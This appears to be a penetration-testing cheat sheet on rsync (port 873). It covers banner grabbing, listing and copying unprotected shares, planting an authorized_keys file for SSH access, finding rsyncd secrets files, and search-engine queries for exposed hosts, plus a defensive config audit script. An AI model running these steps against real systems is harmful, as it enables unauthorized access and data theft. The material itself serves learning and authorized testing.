---
title: "873 - Rsync"
weight: 873
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

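💡 **Study tip**: This document covers penetration-testing methods for **873 - rsync** and is intended as a reference for information-security beginners and practitioners.

⚠️ **Legal notice**: This document is for learning and authorized testing only. Testing systems without authorization may violate laws and regulations.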

---

**Default port:** 873

```
PORT    STATE SERVICE REASON
873/tcp open  rsync   syn-ack
```

### Information Gathering

#### Banner & Manual communication

```bash
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0        <--- You receive this banner with the version from the server
@RSYNCD: 31.0        <--- Then you send the same info
#list                <--- Then you ask the server to list
raidroot             <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID	<--- Enumeration finished
@RSYNCD: EXIT         <--- Server closes the connection

# Now let's try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password
```

#### **Enumerating Shared Folders**

**Rsync modules** are **directory shares** that might be **protected with passwords**. To identify the available modules and check whether they require passwords, use the following commands:

```bash
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

## Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
```

Be aware that some shares might be hidden and therefore not appear in the list. Additionally, access to some shares might be restricted to specific **credentials**, indicated by an **"Access Denied"** message.

#### [**Brute Force**](../generic-hacking/brute-force.md#rsync)

#### Manual Rsync Usage

Upon obtaining a **module list**, actions depend on whether authentication is needed. Without authentication, **listing** and **copying** files from a shared folder to a local directory is achieved through:

```bash
## Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name

## Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
```

This process **recursively transfers files**, preserving their attributes and permissions.

With **credentials**, listing and downloading from a shared folder can be done as follows, where a password prompt will appear:

```bash
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
```

To **upload content**, such as an _**authorized_keys**_ file for access, use:

```bash
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
```

### POST

To locate the rsyncd configuration file, execute:

```bash
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
```

Within this file, a _secrets file_ parameter might point to a file containing **usernames and passwords** for rsyncd authentication.
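From the defender's side, the same configuration file shows which modules are exposed. The script below is an added example (not from the original page or the rsync project) that audits an `rsyncd.conf` for anonymous, writable, unrestricted and listed modules; the sample configuration is constructed, and its module names are borrowed from the banner session above only as labels.

```python
# Constructed sample rsyncd.conf (not taken from a real host).
SAMPLE_CONF = """\
read only = yes

[NAS_Public]
path = /srv/public
Read Only = no

[raidroot]
path = /srv/raid
auth users = backup
secrets file = /etc/rsyncd.secrets
hosts allow = 192.168.0.0/24
list = no
"""

# Built-in rsyncd defaults for the parameters audited here (rsyncd.conf(5)).
DEFAULTS = {"authusers": "", "secretsfile": "", "readonly": "yes",
            "hostsallow": "", "list": "yes"}
TRUE = {"yes", "true", "1"}

def audit(conf_text):
    """Return {module: [findings]} for settings that expose a module."""
    global_params, modules, current = {}, {}, None
    for line in map(str.strip, conf_text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = modules.setdefault(line[1:-1].strip(), {})
        elif "=" in line and not line.startswith("#"):
            name, value = line.split("=", 1)
            # Parameter names ignore case and whitespace: "Read Only" == "readonly".
            key = "".join(name.lower().split())
            (global_params if current is None else current)[key] = value.strip()
    report = {}
    for module, params in modules.items():
        eff = {**DEFAULTS, **global_params, **params}  # module > global > default
        findings = []
        if not eff["authusers"]:
            findings.append("anonymous access: no 'auth users'")
        elif not eff["secretsfile"]:
            findings.append("'auth users' set without a 'secrets file'")
        if eff["readonly"].lower() not in TRUE:
            findings.append("writable: 'read only' is disabled")
        if not eff["hostsallow"]:
            findings.append("reachable from any host: no 'hosts allow'")
        if eff["list"].lower() in TRUE:
            findings.append("visible in module listing: 'list' is enabled")
        report[module] = findings
    return report
```

To check a real host, pass the file contents, for example `audit(open("/etc/rsyncd.conf").read())`. The script does not inspect the permissions of the secrets file itself, which should be checked separately.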

---


### Search Engine Syntax

#### FOFA

```bash
# FOFA search syntax
port="873"
```

#### Shodan

```bash
# Shodan search syntax
port:873
```

#### ZoomEye

```bash
# ZoomEye search syntax
port:873
```

---

## 📖 References

- [HackTricks - 873-rsync](https://book.hacktricks.wiki/en/network-services-pentesting/873-rsync.html)

